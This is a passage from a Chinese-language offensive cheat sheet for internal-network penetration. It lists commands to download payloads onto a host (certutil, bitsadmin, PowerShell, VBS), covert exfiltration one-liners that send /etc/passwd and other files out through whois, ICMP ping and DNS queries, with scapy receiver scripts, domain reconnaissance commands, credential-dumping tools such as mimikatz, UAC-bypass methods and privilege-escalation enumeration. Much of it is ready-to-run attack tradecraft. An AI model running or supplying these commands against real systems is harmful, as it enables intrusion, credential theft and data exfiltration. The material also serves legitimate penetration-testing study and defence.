</code></pre><p>wget </p>
<pre class="language-"><code>wget http://site.com/1.rar -O 1.rar
</code></pre><p>ariac2&#xFF08;&#x9700;&#x5B89;&#x88C5;&#xFF09; </p>
<pre class="language-"><code>aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2
</code></pre><p>powershell</p>
<pre class="language-"><code>$p = New-Object System.Net.WebClient 
$p.DownloadFile(&quot;http://domain/file&quot;,&quot;C:%homepath%file&quot;)
</code></pre><p>vbs&#x811A;&#x672C; </p>
<pre class="language-"><code>Set args = Wscript.Arguments
Url = &quot;http://domain/file&quot;
dim xHttp: Set xHttp = createobject(&quot;Microsoft.XMLHTTP&quot;)
dim bStrm: Set bStrm = createobject(&quot;Adodb.Stream&quot;)
xHttp.Open &quot;GET&quot;, Url, False
xHttp.Send
with bStrm
.type = 1 &apos;
.open
.write xHttp.responseBody
.savetofile &quot; C:\%homepath%\file&quot;, 2 &apos;
end with
</code></pre><blockquote>
<p>&#x6267;&#x884C; &#xFF1A;cscript test.vbs</p>
</blockquote>
<p>Perl </p>
<pre class="language-"><code>#!/usr/bin/perl 
use LWP::Simple; 
getstore(&quot;http://domain/file&quot;, &quot;file&quot;);
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;perl test.pl</p>
</blockquote>
<p>Python </p>
<pre class="language-"><code>#!/usr/bin/python 
import urllib2 
u = urllib2.urlopen(&apos;http://domain/file&apos;) 
localFile = open(&apos;local_file&apos;, &apos;w&apos;) 
localFile.write(u.read()) 
localFile.close()
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;python test.py</p>
</blockquote>
<p>Ruby </p>
<pre class="language-"><code>#!/usr/bin/ruby
require &apos;net/http&apos;
Net::HTTP.start(&quot;www.domain.com&quot;) { |http|
r = http.get(&quot;/file&quot;)
open(&quot;save_location&quot;, &quot;wb&quot;) { |file|
file.write(r.body)
}
}
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;ruby test.rb</p>
</blockquote>
<p>PHP </p>
<pre class="language-"><code><span class="token prolog">&lt;?php
$url  = &apos;http://www.example.com/file&apos;;
$path = &apos;/path/to/file&apos;;
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?&gt;</span>
</code></pre><blockquote>
<p>&#x6267;&#x884C;&#xFF1A;php test.php</p>
</blockquote>
<p>NC 
attacker </p>
<pre class="language-"><code>cat file | nc -l 1234
</code></pre><p>target</p>
<pre class="language-"><code>nc host_ip 1234 &gt; file
</code></pre><p>FTP</p>
<pre class="language-"><code>ftp 127.0.0.1 username password get file exit
</code></pre><p>TFTP </p>
<pre class="language-"><code>tftp -i host GET C:%homepath%file location_of_file_on_tftp_server
</code></pre><p>Bitsadmin </p>
<pre class="language-"><code>bitsadmin /transfer n http://domain/file c:%homepath%file
</code></pre><p>Window &#x6587;&#x4EF6;&#x5171;&#x4EAB; </p>
<pre class="language-"><code>net use x: \127.0.0.1\share /user:example.comuserID myPassword
</code></pre><p>SCP 
&#x672C;&#x5730;&#x5230;&#x8FDC;&#x7A0B; </p>
<pre class="language-"><code>scp file user@host.com:/tmp
</code></pre><p>&#x8FDC;&#x7A0B;&#x5230;&#x672C;&#x5730; </p>
<pre class="language-"><code>scp user@host.com:/tmp file
</code></pre><p>rsync 
&#x8FDC;&#x7A0B;rsync&#x670D;&#x52A1;&#x5668;&#x4E2D;&#x62F7;&#x8D1D;&#x6587;&#x4EF6;&#x5230;&#x672C;&#x5730;&#x673A; </p>
<pre class="language-"><code>rsync -av root@192.168.78.192::www /databack
</code></pre><p>&#x672C;&#x5730;&#x673A;&#x5668;&#x62F7;&#x8D1D;&#x6587;&#x4EF6;&#x5230;&#x8FDC;&#x7A0B;rsync&#x670D;&#x52A1;&#x5668; </p>
<pre class="language-"><code>rsync -av /databack root@192.168.78.192::www
</code></pre><p>certutil.exe </p>
<pre class="language-"><code>certutil.exe -urlcache -split -f http://site.com/file
</code></pre><p>copy</p>
<pre class="language-"><code>copy \\IP\ShareName\file.exe file.exe
</code></pre><p>WHOIS
&#x63A5;&#x6536;&#x7AEF; Host B&#xFF1A;</p>
<pre class="language-"><code>nc -vlnp 1337 | sed &quot;s/ //g&quot; | base64 -d
</code></pre><p>&#x53D1;&#x9001;&#x7AEF; Host A&#xFF1A;</p>
<pre class="language-"><code>whois -h host_ip -p 1337 `cat /etc/passwd | base64`
</code></pre><p><a href="https://twitter.com/mubix/status/1102780436118409216" target="_blank">WHOIS + TAR</a>
First:  </p>
<pre class="language-"><code>ncat -k -l -p 4444 | tee files.b64  #tee to a file so you can make sure you have it
</code></pre><p>Next</p>
<pre class="language-"><code>tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits
</code></pre><p>Finally</p>
<pre class="language-"><code>cat files.b64 | tr -d &apos;\r\n&apos; | base64 -d | tar zxv #to get the files out
</code></pre><p>PING
&#x53D1;&#x9001;&#x7AEF;:</p>
<pre class="language-"><code>xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
</code></pre><p>&#x63A5;&#x6536;&#x7AEF;<code>ping_receiver.py</code>:</p>
<pre class="language-"><code>import sys

try:
    from scapy.all import *
except:
    print(&quot;Scapy not found, please install scapy: pip install scapy&quot;)
    sys.exit(0)


def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f&apos;{data.decode(&quot;utf-8&quot;)}&apos;, flush=True, end=&quot;&quot;, sep=&quot;&quot;)

sniff(iface=&quot;eth0&quot;, prn=process_packet)
</code></pre><pre class="language-"><code>python3 ping_receiver.py
</code></pre><p>DIG
&#x53D1;&#x9001;&#x7AEF;:</p>
<pre class="language-"><code>xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
</code></pre><p>&#x63A5;&#x6536;&#x7AEF;<code>dns_reciver.py</code>:</p>
<pre class="language-"><code>try:
    from scapy.all import *
except:
    print(&quot;Scapy not found, please install scapy: pip install scapy&quot;)

def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode(&apos;utf-8&apos;)
        root_domain = domain.split(&apos;.&apos;)[1]
        if root_domain.startswith(&apos;gooogle&apos;):
            print(f&apos;{bytearray.fromhex(domain[:-13]).decode(&quot;utf-8&quot;)}&apos;, flush=True, end=&apos;&apos;)

sniff(iface=&quot;eth0&quot;, prn=process_packet)
</code></pre><pre class="language-"><code>python3 dns_reciver.py
</code></pre><p>... </p>
<h2 id="&#x642D;&#x5EFA;-http-server"><a name="&#x642D;&#x5EFA;-http-server" class="anchor-navigation-ex-anchor" href="#&#x642D;&#x5EFA;-http-server"><i class="fa fa-link" aria-hidden="true"></i></a>&#x642D;&#x5EFA; HTTP server</h2>
<p>python2</p>
<pre class="language-"><code>python -m SimpleHTTPServer 1337
</code></pre><p>python3</p>
<pre class="language-"><code>python -m http.server 1337
</code></pre><p>PHP 5.4+</p>
<pre class="language-"><code>php -S 0.0.0.0:1337
</code></pre><p>ruby</p>
<pre class="language-"><code>ruby -rwebrick -e&apos;WEBrick::HTTPServer.new(:Port =&gt; 1337, :DocumentRoot =&gt; Dir.pwd).start&apos;
</code></pre><pre class="language-"><code>ruby -run -e httpd . -p 1337
</code></pre><p>Perl</p>
<pre class="language-"><code>perl -MHTTP::Server::Brick -e &apos;$s=HTTP::Server::Brick-&gt;new(port=&gt;1337); $s-&gt;mount(&quot;/&quot;=&gt;{path=&gt;&quot;.&quot;}); $s-&gt;start&apos;
</code></pre><pre class="language-"><code>perl -MIO::All -e &apos;io(&quot;:8080&quot;)-&gt;fork-&gt;accept-&gt;(sub { $_[0] &lt; io(-x $1 +? &quot;./$1 |&quot; : $1) if /^GET \/(.*) / })&apos;
</code></pre><p>busybox httpd</p>
<pre class="language-"><code>busybox httpd -f -p 8000
</code></pre><h1 id="&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><a name="&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x4FE1;&#x606F;&#x641C;&#x96C6;</h1>
<h2 id="&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><a name="&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x672C;&#x673A;&#x4FE1;&#x606F;&#x641C;&#x96C6;</h2>
<h3 id="1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;"><a name="1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>1&#x3001;&#x7528;&#x6237;&#x5217;&#x8868;</h3>
<p>windows&#x7528;&#x6237;&#x5217;&#x8868; 
&#x5206;&#x6790;&#x90AE;&#x4EF6;&#x7528;&#x6237;&#xFF0C;&#x5185;&#x7F51;[&#x57DF;]&#x90AE;&#x4EF6;&#x7528;&#x6237;&#xFF0C;&#x901A;&#x5E38;&#x5C31;&#x662F;&#x5185;&#x7F51;[&#x57DF;]&#x7528;&#x6237; </p>
<h3 id="2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;"><a name="2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>2&#x3001;&#x8FDB;&#x7A0B;&#x5217;&#x8868;</h3>
<p>&#x6790;&#x6740;&#x6BD2;&#x8F6F;&#x4EF6;/&#x5B89;&#x5168;&#x76D1;&#x63A7;&#x5DE5;&#x5177;&#x7B49; 
&#x90AE;&#x4EF6;&#x5BA2;&#x6237;&#x7AEF; 
VPN 
ftp&#x7B49;  </p>
<h3 id="3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;"><a name="3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>3&#x3001;&#x670D;&#x52A1;&#x5217;&#x8868;</h3>
<p>&#x4E0E;&#x5B89;&#x5168;&#x9632;&#x8303;&#x5DE5;&#x5177;&#x6709;&#x5173;&#x670D;&#x52A1;[&#x5224;&#x65AD;&#x662F;&#x5426;&#x53EF;&#x4EE5;&#x624B;&#x52A8;&#x5F00;&#x5173;&#x7B49;]
&#x5B58;&#x5728;&#x95EE;&#x9898;&#x7684;&#x670D;&#x52A1;[&#x6743;&#x9650;/&#x6F0F;&#x6D1E;]</p>
<h3 id="4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;"><a name="4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>4&#x3001;&#x7AEF;&#x53E3;&#x5217;&#x8868;</h3>
<p>&#x5F00;&#x653E;&#x7AEF;&#x53E3;&#x5BF9;&#x5E94;&#x7684;&#x5E38;&#x89C1;&#x670D;&#x52A1;/&#x5E94;&#x7528;&#x7A0B;&#x5E8F;[&#x533F;&#x540D;/&#x6743;&#x9650;/&#x6F0F;&#x6D1E;&#x7B49;]
&#x5229;&#x7528;&#x7AEF;&#x53E3;&#x8FDB;&#x884C;&#x4FE1;&#x606F;&#x6536;&#x96C6;</p>
<h3 id="5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;"><a name="5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;" class="anchor-navigation-ex-anchor" href="#5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;"><i class="fa fa-link" aria-hidden="true"></i></a>5&#x3001;&#x8865;&#x4E01;&#x5217;&#x8868;</h3>
<p>&#x5206;&#x6790; Windows &#x8865;&#x4E01;
&#x7B2C;&#x4E09;&#x65B9;&#x8F6F;&#x4EF6;[Java/Oracle/Flash &#x7B49;]&#x6F0F;&#x6D1E;</p>
<h3 id="6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;"><a name="6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;" class="anchor-navigation-ex-anchor" href="#6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;"><i class="fa fa-link" aria-hidden="true"></i></a>6&#x3001;&#x672C;&#x673A;&#x5171;&#x4EAB;</h3>
<p>&#x672C;&#x673A;&#x5171;&#x4EAB;&#x5217;&#x8868;/&#x8BBF;&#x95EE;&#x6743;&#x9650;
&#x672C;&#x673A;&#x8BBF;&#x95EE;&#x7684;&#x57DF;&#x5171;&#x4EAB;/&#x8BBF;&#x95EE;&#x6743;&#x9650;</p>
<h3 id="7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;"><a name="7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;" class="anchor-navigation-ex-anchor" href="#7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;"><i class="fa fa-link" aria-hidden="true"></i></a>7&#x3001;&#x672C;&#x7528;&#x6237;&#x4E60;&#x60EF;&#x5206;&#x6790;</h3>
<p>&#x5386;&#x53F2;&#x8BB0;&#x5F55; 
&#x6536;&#x85CF;&#x5939; 
&#x6587;&#x6863;&#x7B49; </p>
<h3 id="8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;"><a name="8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>8&#x3001;&#x83B7;&#x53D6;&#x5F53;&#x524D;&#x7528;&#x6237;&#x5BC6;&#x7801;&#x5DE5;&#x5177;</h3>
<h4 id="windows"><a name="windows" class="anchor-navigation-ex-anchor" href="#windows"><i class="fa fa-link" aria-hidden="true"></i></a>Windows</h4>
<ul>
<li><a href="https://github.com/gentilkiwi/mimikatz" target="_blank">mimikatz</a>  </li>
<li><a href="https://github.com/vergl4s/pentesting-dump/tree/master/net/Windows/wce_v1_42beta_x64" target="_blank">wce</a>  </li>
<li><a href="https://github.com/peewpw/Invoke-WCMDump" target="_blank">Invoke-WCMDump  </a></li>
<li><a href="https://github.com/giMini/mimiDbg" target="_blank">mimiDbg  </a></li>
<li><a href="https://github.com/AlessandroZ/LaZagne" target="_blank">LaZagne</a></li>
<li><a href="http://launcher.nirsoft.net/downloads/" target="_blank">nirsoft_package</a></li>
<li><a href="https://github.com/quarkslab/quarkspwdump" target="_blank">QuarksPwDump</a> <a href="https://github.com/mcandre/fgdump" target="_blank">fgdump</a></li>
<li>&#x661F;&#x53F7;&#x67E5;&#x770B;&#x5668;&#x7B49;</li>
</ul>
<h4 id="linux"><a name="linux" class="anchor-navigation-ex-anchor" href="#linux"><i class="fa fa-link" aria-hidden="true"></i></a>Linux</h4>
<ul>
<li><a href="https://github.com/AlessandroZ/LaZagne" target="_blank">LaZagne</a>  </li>
<li><a href="https://github.com/huntergregal/mimipenguin" target="_blank">mimipenguin</a></li>
</ul>
<h2 id="&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><a name="&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6269;&#x6563;&#x4FE1;&#x606F;&#x6536;&#x96C6;</h2>
<h3 id="&#x7AEF;&#x53E3;&#x626B;&#x63CF;"><a name="&#x7AEF;&#x53E3;&#x626B;&#x63CF;" class="anchor-navigation-ex-anchor" href="#&#x7AEF;&#x53E3;&#x626B;&#x63CF;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7AEF;&#x53E3;&#x626B;&#x63CF;</h3>
<h4 id="&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;"><a name="&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x626B;&#x63CF;&#x5DE5;&#x5177;</h4>
<ul>
<li><a href="https://nmap.org/" target="_blank">nmap</a> </li>
<li><a href="https://github.com/robertdavidgraham/masscan" target="_blank">masscan</a> </li>
<li><a href="https://github.com/zmap/zmap" target="_blank">zmap</a></li>
<li>s&#x626B;&#x63CF;&#x5668; </li>
<li>&#x81EA;&#x5199;&#x811A;&#x672C;&#x7B49; </li>
<li>NC </li>
<li>...</li>
</ul>
<h3 id="&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;"><a name="&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x7F51;&#x62D3;&#x6251;&#x67B6;&#x6784;&#x5206;&#x6790;</h3>
<ul>
<li>DMZ</li>
<li>&#x7BA1;&#x7406;&#x7F51;</li>
<li>&#x751F;&#x4EA7;&#x7F51;</li>
<li>&#x6D4B;&#x8BD5;&#x7F51;</li>
</ul>
<h3 id="&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;"><a name="&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x89C1;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x547D;&#x4EE4;</h3>
<p>ipconfig:</p>
<pre class="language-"><code>ipconfig /all ------&gt; &#x67E5;&#x8BE2;&#x672C;&#x673A; IP &#x6BB5;&#xFF0C;&#x6240;&#x5728;&#x57DF;&#x7B49;
</code></pre><p>net:</p>
<pre class="language-"><code>net user ------&gt; &#x672C;&#x673A;&#x7528;&#x6237;&#x5217;&#x8868;
net localgroup administrators ------&gt; &#x672C;&#x673A;&#x7BA1;&#x7406;&#x5458;[&#x901A;&#x5E38;&#x542B;&#x6709;&#x57DF;&#x7528;&#x6237;]
net user /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x7528;&#x6237;
net group /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x91CC;&#x9762;&#x7684;&#x5DE5;&#x4F5C;&#x7EC4;
net group &quot;domain admins&quot; /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x7BA1;&#x7406;&#x5458;&#x7528;&#x6237;&#x7EC4;
net localgroup administrators /domain ------&gt; &#x767B;&#x5F55;&#x672C;&#x673A;&#x7684;&#x57DF;&#x7BA1;&#x7406;&#x5458;
net localgroup administrators workgroup\user001 /add -----&gt;&#x57DF;&#x7528;&#x6237;&#x6DFB;&#x52A0;&#x5230;&#x672C;&#x673A; net group &quot;Domain controllers&quot; -------&gt; &#x67E5;&#x770B;&#x57DF;&#x63A7;&#x5236;&#x5668;(&#x5982;&#x679C;&#x6709;&#x591A;&#x53F0;)
net view ------&gt; &#x67E5;&#x8BE2;&#x540C;&#x4E00;&#x57DF;&#x5185;&#x673A;&#x5668;&#x5217;&#x8868; net view /domain ------&gt; &#x67E5;&#x8BE2;&#x57DF;&#x5217;&#x8868;
net view /domain:domainname
</code></pre><p>dsquery </p>
<pre class="language-"><code>dsquery computer domainroot -limit 65535 &amp;&amp; net group &quot;domain
computers&quot; /domain ------&gt; &#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x6240;&#x6709;&#x673A;&#x5668;&#x540D;
dsquery user domainroot -limit 65535 &amp;&amp; net user /domain------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x6240;&#x6709;&#x7528;&#x6237;&#x540D;
dsquery subnet ------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x7F51;&#x6BB5;&#x5212;&#x5206;
dsquery group &amp;&amp; net group /domain ------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x5206;&#x7EC4; 
dsquery ou ------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x7EC4;&#x7EC7;&#x5355;&#x4F4D; 
dsquery server &amp;&amp; net time /domain------&gt;&#x5217;&#x51FA;&#x8BE5;&#x57DF;&#x5185;&#x57DF;&#x63A7;&#x5236;&#x5668;
</code></pre><h2 id="&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><a name="&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;" class="anchor-navigation-ex-anchor" href="#&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7B2C;&#x4E09;&#x65B9;&#x4FE1;&#x606F;&#x6536;&#x96C6;</h2>
<ul>
<li>NETBIOS &#x4FE1;&#x606F;&#x6536;&#x96C6; </li>
<li>SMB &#x4FE1;&#x606F;&#x6536;&#x96C6;  </li>
<li>&#x7A7A;&#x4F1A;&#x8BDD;&#x4FE1;&#x606F;&#x6536;&#x96C6;  </li>
<li>&#x6F0F;&#x6D1E;&#x4FE1;&#x606F;&#x6536;&#x96C6;&#x7B49; </li>
</ul>
<h1 id="&#x6743;&#x9650;&#x63D0;&#x5347;"><a name="&#x6743;&#x9650;&#x63D0;&#x5347;" class="anchor-navigation-ex-anchor" href="#&#x6743;&#x9650;&#x63D0;&#x5347;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6743;&#x9650;&#x63D0;&#x5347;</h1>
<h2 id="windows_1"><a name="windows_1" class="anchor-navigation-ex-anchor" href="#windows_1"><i class="fa fa-link" aria-hidden="true"></i></a>Windows</h2>
<h3 id="bypassuac"><a name="bypassuac" class="anchor-navigation-ex-anchor" href="#bypassuac"><i class="fa fa-link" aria-hidden="true"></i></a>BypassUAC</h3>
<h4 id="&#x5E38;&#x7528;&#x65B9;&#x6CD5;"><a name="&#x5E38;&#x7528;&#x65B9;&#x6CD5;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x7528;&#x65B9;&#x6CD5;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x7528;&#x65B9;&#x6CD5;</h4>
<ul>
<li>&#x4F7F;&#x7528;IFileOperation COM&#x63A5;&#x53E3;</li>
<li>&#x4F7F;&#x7528;Wusa.exe&#x7684;extract&#x9009;&#x9879;</li>
<li>&#x8FDC;&#x7A0B;&#x6CE8;&#x5165;SHELLCODE &#x5230;&#x5080;&#x5121;&#x8FDB;&#x7A0B;</li>
<li>DLL&#x52AB;&#x6301;&#xFF0C;&#x52AB;&#x6301;&#x7CFB;&#x7EDF;&#x7684;DLL&#x6587;&#x4EF6;</li>
<li>eventvwr.exe and registry hijacking</li>
<li>sdclt.exe</li>
<li>SilentCleanup</li>
<li>wscript.exe</li>
<li>cmstp.exe</li>
<li>&#x4FEE;&#x6539;&#x73AF;&#x5883;&#x53D8;&#x91CF;&#xFF0C;&#x52AB;&#x6301;&#x9AD8;&#x6743;&#x9650;.Net&#x7A0B;&#x5E8F;</li>
<li>&#x4FEE;&#x6539;&#x6CE8;&#x518C;&#x8868;HKCU\Software\Classes\CLSID&#xFF0C;&#x52AB;&#x6301;&#x9AD8;&#x6743;&#x9650;&#x7A0B;&#x5E8F;</li>
<li>&#x76F4;&#x63A5;&#x63D0;&#x6743;&#x8FC7;UAC</li>
</ul>
<h4 id="&#x5E38;&#x7528;&#x5DE5;&#x5177;"><a name="&#x5E38;&#x7528;&#x5DE5;&#x5177;" class="anchor-navigation-ex-anchor" href="#&#x5E38;&#x7528;&#x5DE5;&#x5177;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5E38;&#x7528;&#x5DE5;&#x5177;</h4>
<ul>
<li><a href="https://github.com/hfiref0x/UACME" target="_blank">UACME </a></li>
<li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC" target="_blank">Bypass-UAC </a></li>
<li><a href="https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC/Yamabiko" target="_blank">Yamabiko </a></li>
<li>... </li>
</ul>
<h3 id="&#x63D0;&#x6743;"><a name="&#x63D0;&#x6743;" class="anchor-navigation-ex-anchor" href="#&#x63D0;&#x6743;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x63D0;&#x6743;</h3>
<ul>
<li><p>windows&#x5185;&#x6838;&#x6F0F;&#x6D1E;&#x63D0;&#x6743;</p>
<blockquote>
<p>&#x68C0;&#x6D4B;&#x7C7B;:<a href="https://github.com/GDSSecurity/Windows-Exploit-Suggester" target="_blank">Windows-Exploit-Suggester</a>,<a href="https://github.com/brianwrf/WinSystemHelper" target="_blank">WinSystemHelper</a>,<a href="https://github.com/bitsadmin/wesng" target="_blank">wesng</a>
&#x5229;&#x7528;&#x7C7B;:<a href="https://github.com/SecWiki/windows-kernel-exploits" target="_blank">windows-kernel-exploits</a>&#xFF0C;<a href="https://github.com/AlessandroZ/BeRoot.git" target="_blank">BeRoot</a></p>
</blockquote>
</li>
<li><p>&#x670D;&#x52A1;&#x63D0;&#x6743; </p>
<blockquote>
<p>&#x6570;&#x636E;&#x5E93;&#x670D;&#x52A1;&#xFF0C;ftp&#x670D;&#x52A1;&#x7B49;</p>
</blockquote>
</li>
<li><p>WINDOWS&#x9519;&#x8BEF;&#x7CFB;&#x7EDF;&#x914D;&#x7F6E; </p>
</li>
<li>&#x7CFB;&#x7EDF;&#x670D;&#x52A1;&#x7684;&#x9519;&#x8BEF;&#x6743;&#x9650;&#x914D;&#x7F6E;&#x6F0F;&#x6D1E; </li>
<li>&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6CE8;&#x518C;&#x8868;&#x6743;&#x9650;&#x914D;&#x7F6E; </li>
<li>&#x4E0D;&#x5B89;&#x5168;&#x7684;&#x6587;&#x4EF6;/&#x6587;&#x4EF6;&#x5939;&#x6743;&#x9650;&#x914D;&#x7F6E; </li>
<li>&#x8BA1;&#x5212;&#x4EFB;&#x52A1; </li>
<li>&#x4EFB;&#x610F;&#x7528;&#x6237;&#x4EE5;NT AUTHORITY\SYSTEM&#x6743;&#x9650;&#x5B89;&#x88C5;msi </li>
<li>&#x63D0;&#x6743;&#x811A;&#x672C; <blockquote>
<p><a href="https://github.com/HarmJ0y/PowerUp/blob/master/PowerUp.ps1" target="_blank">PowerUP</a>,<a href="https://github.com/rsmudge/ElevateKit" target="_blank">ElevateKit</a></p>
</blockquote>
</li>
</ul>
<h2 id="linux_1"><a name="linux_1" class="anchor-navigation-ex-anchor" href="#linux_1"><i class="fa fa-link" aria-hidden="true"></i></a>Linux</h2>
<h3 id="&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;"><a name="&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;" class="anchor-navigation-ex-anchor" href="#&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5185;&#x6838;&#x6EA2;&#x51FA;&#x63D0;&#x6743;</h3>
<p><a href="https://github.com/SecWiki/linux-kernel-exploits" target="_blank">linux-kernel-exploits </a></p>
<h3 id="&#x8BA1;&#x5212;&#x4EFB;&#x52A1;"><a name="&#x8BA1;&#x5212;&#x4EFB;&#x52A1;" class="anchor-navigation-ex-anchor" href="#&#x8BA1;&#x5212;&#x4EFB;&#x52A1;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x8BA1;&#x5212;&#x4EFB;&#x52A1;</h3>
<pre class="language-"><code>crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
</code></pre><h3 id="suid"><a name="suid" class="anchor-navigation-ex-anchor" href="#suid"><i class="fa fa-link" aria-hidden="true"></i></a>SUID</h3>
<pre class="language-"><code>find / -user root -perm -4000 -print 2&gt;/dev/null
